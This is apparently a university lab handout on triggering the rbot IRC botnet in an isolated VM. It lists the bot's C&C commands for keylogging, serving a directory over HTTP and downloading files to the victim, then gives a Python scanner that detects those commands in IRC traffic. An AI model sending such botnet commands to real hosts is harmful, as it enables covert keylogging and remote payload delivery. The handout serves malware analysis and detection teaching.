IDS and Penetration Testing Lab IIIa
Dissecting a Botnet C&C - rbot Triggering Lab

Malware operation

Upon execution, the malware connects to the botirc.net server and establishes a standard IRC session with the #test channel (PASS, NICK, USER). Typically the malware registers itself with the nick [M]bBot XXXX, where XXXX are four random digits. After establishing the session, the malware enters an infinite loop that receives IRC messages, interprets commands and executes them. Via these commands the malware provides three main functionalities: a keylogger, an HTTP server and a downloader.

Experiment setup

To run and trigger the rbot malware, an IRC server and an IRC client are required, with connectivity from the malware to the IRC server. In the setup demonstrated in class, the malware was executed in a Windows XP SP2 VM (disconnected from the Internet). This VM also runs a local IRC server using the bewareircd utility. To control the bot instance we run a simple IRC client using the mIRC utility. Since the malware connects to an IRC server named Botirc.net, we need to resolve that name locally by adding a corresponding entry to the %SYSTEMROOT%\system32\drivers\etc\hosts file, such as:

127.0.0.1 Botirc.net

Using this configuration, one can perform the following steps to activate the rbot instance:

1. Run the IRC server (c:\distr\bewareircd-win32\bircd.exe). It creates a local IRC server ready to host new servers and channels.
2. Set up the mIRC client:
   a. Start the client.
   b. Create a new IRC server (press Add, then specify Botirc.net and any ID, e.g. r_bot_server_test). This registers an IRC server named Botirc.net.
   c. Double-click the created server.
   d. Enter the #test channel and click Join. This starts the IRC session.
   e. Now you can run rbot (bbot) and you should see that it joined the session. You can send it the commands given in the next section.

[Figure: IRC client screenshot - "Welcome to rbot C&C!"]

Commands triggering

To activate a component/functionality of the bot, one needs to send a certain notice message to the bot instance over the IRC channel. The table below presents the required format of the IRC commands.

Keylogger
   Command to malware: /notice bot_instance_nick keylog file
   Example: /notice [M]bBot 4842 keylog file
   Result: the malware creates a thread that traces the current window focus and pressed keys using a hookless technique (i.e. based on GetAsyncKeyState). The traced keys and context data are stored in c:\windows\system32\key.txt.
   Response from malware (if successful): [KEYLOG]: Key logger active.

HTTP server
   Command to malware: /notice bot_instance_nick httpserver port path
   Example: /notice [M]bBot 4842 httpserver 1235 C:\windows\
   Result: the malware starts an HTTP server that listens on the given port and provides access to the specified directory (path).
   Example response from malware (if successful): [HTTPD]: Server listening on IP: 127.0.0.1:1235, Directory: C:\windows\.

Downloader
   Command to malware: /notice bot_instance_nick d0wnl04d URL target_file
   Example: /notice [M]bBot 9497 d0wnl04d http://gmail.com/gmail.htm c:\gmail_copy.htm
   Result: the malware downloads a file from the specified URL to the specified file on the victim host.
   Example response from malware (if successful):
   [DOWNLOAD]: Downloading URL: http://gmail.com/gmail.htm to: c:\gmail_copy.htm.
   [DOWNLOAD]: Downloaded 57.8 KB to c:\gmail_copy.htm @ 57.8 KB/sec.

Examples

Keylogger
The figures below show screenshots of successful keylogger activation. The first figure shows the typical response from the malware to the keylogger command. The second screen shows the log file (c:\windows\system32\key.txt).

HTTP server
The figures below show screenshots of successful HTTP server activation.

Downloader
The figures below show screenshots of successful downloader activation.
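Detection side of the same lab, as an added example that is not part of the handout: a small scanner that parses raw IRC lines (as an IDS or a captured session log would see them) and flags the three C&C command formats, the bot's acknowledgement messages and the [M]bBot XXXX nick pattern. The sample traffic is constructed; because IRC nicks cannot contain whitespace, the bot's own message prefix is written as [M]bBot4842 (an assumption), while the NOTICE target keeps the form the handout prints, and the nick regex accepts either.

```python
import re

# Wire-format IRC line: optional ":prefix", command, target(s), ":trailing text".
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>[A-Z]+)\s+(?P<target>.+?)\s+:(?P<text>.*)$")

# Operator -> bot command grammar, as documented in the handout.
CC_COMMANDS = {
    "keylogger": re.compile(r"^keylog\b"),
    "httpserver": re.compile(r"^httpserver\s+(?P<port>\d{1,5})\s+(?P<path>\S+)$"),
    "downloader": re.compile(r"^d0wnl04d\s+(?P<url>\S+)\s+(?P<dest>\S+)$"),
}
# Bot -> channel acknowledgements, as documented in the handout.
BOT_REPLY = re.compile(r"^\[(KEYLOG|HTTPD|DOWNLOAD)\]:")
# Nick "[M]bBot XXXX"; separator kept loose (assumption: handout prints a space, IRC nicks cannot contain one).
BOT_NICK = re.compile(r"\[M\]bBot\W?\d{4}")

# Constructed sample traffic (not a capture from the lab).
SAMPLE_IRC = [
    ":alice!a@lab PRIVMSG #test :hello everyone",
    ":op!o@lab NOTICE [M]bBot 4842 :keylog file",
    ":[M]bBot4842!b@lab PRIVMSG #test :[KEYLOG]: Key logger active.",
    ":op!o@lab NOTICE [M]bBot 4842 :httpserver 1235 C:\\windows\\",
    ":[M]bBot4842!b@lab PRIVMSG #test :[HTTPD]: Server listening on IP: 127.0.0.1:1235, Directory: C:\\windows\\.",
    ":op!o@lab NOTICE [M]bBot 9497 :d0wnl04d http://gmail.com/gmail.htm c:\\gmail_copy.htm",
    ":alice!a@lab NOTICE bob :see you tomorrow",
]

def scan_irc_lines(lines):
    """Return (line_no, kind, detail) alerts for rbot C&C traffic found in `lines`."""
    alerts, seen_bots = [], set()
    for no, raw in enumerate(lines, 1):
        m = IRC_LINE.match(raw.strip())
        if not m:
            continue
        cmd, target, text = m.group("cmd"), m.group("target"), m.group("text")
        sender = (m.group("prefix") or "").split("!")[0]
        # A sender whose nick follows the bot naming scheme is reported once.
        if BOT_NICK.search(sender) and sender not in seen_bots:
            seen_bots.add(sender)
            alerts.append((no, "bot-nick", sender))
        # Operator commands travel as NOTICE; record the parsed arguments.
        if cmd == "NOTICE":
            for kind, pat in CC_COMMANDS.items():
                cm = pat.match(text)
                if cm:
                    alerts.append((no, f"cc-command:{kind}", {"target": target, **cm.groupdict()}))
        # Bot acknowledgements confirm a command was executed on the victim.
        if cmd in ("PRIVMSG", "NOTICE") and BOT_REPLY.match(text):
            alerts.append((no, "bot-reply", f"{sender}: {text}"))
    return alerts
```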